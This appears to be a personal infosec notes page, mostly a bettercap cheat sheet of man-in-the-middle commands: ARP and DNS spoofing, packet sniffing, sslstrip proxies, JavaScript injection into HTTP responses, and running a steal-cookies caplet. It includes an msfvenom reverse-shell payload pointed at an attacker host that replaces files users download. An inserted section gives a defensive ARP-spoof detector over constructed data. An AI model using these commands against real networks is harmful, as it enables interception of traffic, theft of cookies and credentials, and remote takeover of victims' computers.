akde/infosec


An Ettercap successor, written in Go. Basic commands:

  • Passive ARP probing:
    • net.recon on
    • net.recon off
  • Active probing:
    • net.probe on
    • net.probe off
  • Sniffing:
    • set net.sniff.output /tmp/sniff.pcap // optional
    • net.sniff on
    • net.sniff off
  • Spoofing:
    • set arp.spoof.targets $target1, $target2, $target3
    • arp.spoof on
    • arp.spoof off
  • DNS Spoofing:
    • set dns.spoof.domains target.domain // the domain which should be resolved as…
    • set dns.spoof.address $attacker_ip // …this IP.
    • dns.spoof on
    • dns.spoof off
  • net.show // all hosts
  • net.show $ip_address // details about one host
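A defender-side counterpart to the arp.spoof commands above, added here as an example that is not part of bettercap or of the original notes: it replays a constructed sequence of ARP replies and flags the cache-poisoning footprint (an IP whose MAC binding changes after it was learned, and a single MAC answering for several IPs). All IPs and MACs below are constructed.

```python
"""Detect the ARP cache poisoning footprint that an arp.spoof session leaves
on a segment. Added example; the ARP reply events are constructed."""
from collections import defaultdict

# Constructed ARP reply events as (ip, mac) pairs, in the order a sniffer on
# the segment would observe them. The first three are the honest bindings;
# the last two are what a spoofing host (MAC cc:...:29) emits to poison the
# caches of the gateway (.1) and a client (.20) so that both talk to it.
CONSTRUCTED_ARP_REPLIES = [
    ("192.168.178.1", "aa:aa:aa:aa:aa:01"),   # gateway
    ("192.168.178.20", "bb:bb:bb:bb:bb:20"),  # a client
    ("192.168.178.29", "cc:cc:cc:cc:cc:29"),  # spoofing host, its own IP
    ("192.168.178.1", "cc:cc:cc:cc:cc:29"),   # gateway IP claimed by .29's MAC
    ("192.168.178.20", "cc:cc:cc:cc:cc:29"),  # client IP claimed by the same MAC
]


def detect_arp_spoof(replies):
    """Return a list of alert tuples for two signals:
    ("binding-change", ip, old_mac, new_mac): an IP's MAC changed after
        it was first learned (first-seen binding is kept as the reference);
    ("multi-ip-mac", mac, (ip, ...)): one MAC now claims several IPs,
        the classic man-in-the-middle pattern."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        known = ip_to_mac.get(ip)
        if known is None:
            ip_to_mac[ip] = mac
        elif known != mac:
            alerts.append(("binding-change", ip, known, mac))
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(("multi-ip-mac", mac, tuple(sorted(mac_to_ips[mac]))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(CONSTRUCTED_ARP_REPLIES):
        print(alert)
```

In practice the same check runs over ARP replies captured with a sniffer (or over periodic dumps of the ARP cache), and a gateway IP that "moves" to a second MAC is the event worth paging on.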

Automation:

  • Repeat a set of commands regularly. The following shows an updated host discovery list every 8 seconds:
    set ticker.period 8
    set ticker.commands "clear; net.show;"
  • Put a set of commands into a Caplet and execute it directly.
    1. Create a Caplet file:
      events.clear
      set ...
      net.sniff on
    2. Execute bettercap with it:
      # bettercap -caplet caplet-file.caplet

HTTP(S) proxy

  • HTTP proxy
    • set http.proxy.sslstrip true // rewrites https references in responses to http
    • http.proxy on
    • http.proxy off
  • HTTPS proxy
    • set https.proxy.sslstrip true // rewrites https references in responses to http
    • https.proxy on
    • https.proxy off

Inject JavaScript into HTTP responses

Start spoofing and set injectjs:

set http.proxy.injectjs "console.log('aha');"
http.proxy on

This creates a proxy on the local system. All (HTML?) content passing through it gets the provided JS injected.

curl -x http://192.168.178.29:8080/ http://naturtrunken.de/
...
<html>...<script type="text/javascript">console.log('aha');</script>...</html>

Replace downloaded files

You want to replace a file a user downloads from another server with your own file.

  1. Create suitable payloads for the target platforms and store them in the autopwn directory. In case of x64 Windows:
    msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=$attacker LPORT=443 -f exe -o /usr/share/bettercap/caplets/download-autopwn/windows/payload.exe
  2. Start bettercap:
    # bettercap -caplet /usr/share/bettercap/caplets/download-autopwn/download-autopwn.cap -eval 'events.ignore endpoint; set arp.spoof.targets $target; arp.spoof on'

Caplets

There are some Caplets available. Update them with caplets.update and list them with caplets.show. Note that by default all traffic on the segment is spoofed; therefore it is better to restrict the targets when using a caplet, like this:

# bettercap -caplet /usr/local/share/bettercap/caplets/steal-cookies/steal-cookies.cap -eval "set arp.spoof.targets $target"

Available Caplets as of 2021/05:

┌─────────────────────────────────────┬──────────────────────────────────────────────────────────────────────┬────────┐
│ Name │ Path │ Size │
├─────────────────────────────────────┼──────────────────────────────────────────────────────────────────────┼────────┤
│ ap │ /usr/share/bettercap/caplets/ap.cap │ 570 B │
│ crypto-miner/crypto-miner │ /usr/share/bettercap/caplets/crypto-miner/crypto-miner.cap │ 666 B │
│ download-autopwn/download-autopwn │ /usr/share/bettercap/caplets/download-autopwn/download-autopwn.cap │ 2.6 kB │
│ fb-phish/fb-phish │ /usr/share/bettercap/caplets/fb-phish/fb-phish.cap │ 140 B │
│ gitspoof/gitspoof │ /usr/share/bettercap/caplets/gitspoof/gitspoof.cap │ 216 B │
│ gps │ /usr/share/bettercap/caplets/gps.cap │ 109 B │
│ hstshijack/hstshijack │ /usr/share/bettercap/caplets/hstshijack/hstshijack.cap │ 1.2 kB │
│ http-req-dump/http-req-dump │ /usr/share/bettercap/caplets/http-req-dump/http-req-dump.cap │ 591 B │
│ http-ui │ /usr/share/bettercap/caplets/http-ui.cap │ 376 B │
│ https-ui │ /usr/share/bettercap/caplets/https-ui.cap │ 655 B │
│ jsinject/jsinject │ /usr/share/bettercap/caplets/jsinject/jsinject.cap │ 210 B │
│ local-sniffer │ /usr/share/bettercap/caplets/local-sniffer.cap │ 244 B │
│ login-manager-abuse/login-man-abuse │ /usr/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B │
│ mana │ /usr/share/bettercap/caplets/mana.cap │ 61 B │
│ massdeauth │ /usr/share/bettercap/caplets/massdeauth.cap │ 302 B │
│ mitm6 │ /usr/share/bettercap/caplets/mitm6.cap │ 551 B │
│ netmon │ /usr/share/bettercap/caplets/netmon.cap │ 42 B │
│ pita │ /usr/share/bettercap/caplets/pita.cap │ 900 B │
│ proxy-script-test/proxy-script-test │ /usr/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B │
│ pwnagotchi-auto │ /usr/share/bettercap/caplets/pwnagotchi-auto.cap │ 330 B │
│ pwnagotchi-manual │ /usr/share/bettercap/caplets/pwnagotchi-manual.cap │ 440 B │
│ rogue-mysql-server │ /usr/share/bettercap/caplets/rogue-mysql-server.cap │ 501 B │
│ rtfm/rtfm │ /usr/share/bettercap/caplets/rtfm/rtfm.cap │ 210 B │
│ simple-passwords-sniffer │ /usr/share/bettercap/caplets/simple-passwords-sniffer.cap │ 131 B │
│ steal-cookies/steal-cookies │ /usr/share/bettercap/caplets/steal-cookies/steal-cookies.cap │ 134 B │
│ tcp-req-dump/tcp-req-dump │ /usr/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap │ 413 B │
│ web-override/web-override │ /usr/share/bettercap/caplets/web-override/web-override.cap │ 254 B │
└─────────────────────────────────────┴──────────────────────────────────────────────────────────────────────┴────────┘
